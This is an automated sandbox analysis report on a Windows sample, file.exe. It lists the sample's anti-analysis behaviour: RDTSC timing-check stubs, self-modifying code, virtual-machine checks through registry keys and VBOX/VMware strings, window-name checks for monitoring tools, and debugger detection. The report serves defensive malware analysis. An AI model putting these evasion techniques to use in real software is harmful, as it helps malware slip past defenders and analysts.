Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D672B second address: 9D674C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE83905447Ch 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jng 00007FE83905447Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D674C second address: 9D6761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FE83906A38Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D68E8 second address: 9D68EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D68EE second address: 9D68F8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D68F8 second address: 9D6913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE839054485h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6913 second address: 9D692E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A397h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D692E second address: 9D6961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FE839054484h 0x00000014 jmp 00007FE83905447Eh 0x00000019 jmp 00007FE839054481h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6961 second address: 9D6967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D6967 second address: 9D696B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9F2A second address: 9D9F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9AD5 second address: 9D9ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9ADD second address: 9D9AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE83906A38Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFF3C second address: 9DFF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFF53 second address: 9DFF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 jbe 00007FE83906A386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE83906A38Fh 0x00000018 jmp 00007FE83906A38Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF2FB second address: 9EF300 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5CB second address: 9EF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5D3 second address: 9EF5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FE83905447Ah 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5E2 second address: 9EF5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5E8 second address: 9EF5F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF5F5 second address: 9EF5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF74B second address: 9EF74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF74F second address: 9EF759 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE83906A386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF759 second address: 9EF76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE83905447Ch 0x0000000c jnl 00007FE839054476h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF76B second address: 9EF771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8BC second address: 9EF8C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8C2 second address: 9EF8C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8C6 second address: 9EF8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8D7 second address: 9EF8DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8DD second address: 9EF8E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8E3 second address: 9EF8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EF8E7 second address: 9EF910 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054485h 0x00000007 jc 00007FE839054476h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FE839054476h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F05DE second address: 9F05E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F05E5 second address: 9F05EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3431 second address: 9F3449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FE83906A38Eh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3598 second address: 9F35B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FE83905447Ch 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FE83905447Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F35B6 second address: 9F35BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E220 second address: A0E236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1020B second address: A10216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE83906A386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0FDAD second address: A0FDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23F27 second address: A23F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23F31 second address: A23F3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22F15 second address: A22F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A38Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A230AA second address: A230B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23692 second address: A236B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE83906A392h 0x0000000a jmp 00007FE83906A38Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A236B6 second address: A236D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE839054487h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23AEE second address: A23AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23AF8 second address: A23AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23AFC second address: A23B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B07 second address: A23B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FE839054486h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A23B2A second address: A23B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26BE2 second address: A26C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FE839054488h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FE83905447Ah 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C26 second address: A26C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C2A second address: A26C34 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C34 second address: A26C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C3A second address: A26C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26C3E second address: A26C53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FE83906A386h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29FA2 second address: A29FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702AD second address: 50702B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702B1 second address: 50702C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702C0 second address: 50702F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE83906A38Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702F2 second address: 50702FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, 516CD279h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50702FC second address: 507030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507030E second address: 5070312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070312 second address: 5070327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50703EA second address: 507040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83905447Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507040E second address: 5070424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070424 second address: 5070428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070428 second address: 507042E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507042E second address: 507047D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE839054488h 0x00000008 pushfd 0x00000009 jmp 00007FE839054482h 0x0000000e jmp 00007FE839054485h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507047D second address: 5070490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070490 second address: 5070496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5070496 second address: 507049A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507049A second address: 507049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946A8D second address: 946A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE83906A386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946C12 second address: 946C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946E51 second address: 946E56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A1982 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A1A1F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 93BB9E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 942BD3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9CBF23 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00554910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0054E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00554570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0054ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0054BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0054F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00553EA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00541160 GetSystemInfo,ExitProcess,

0_2_00541160

Source: file.exe, file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1824677690.000000000105E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1824677690.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1824677690.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

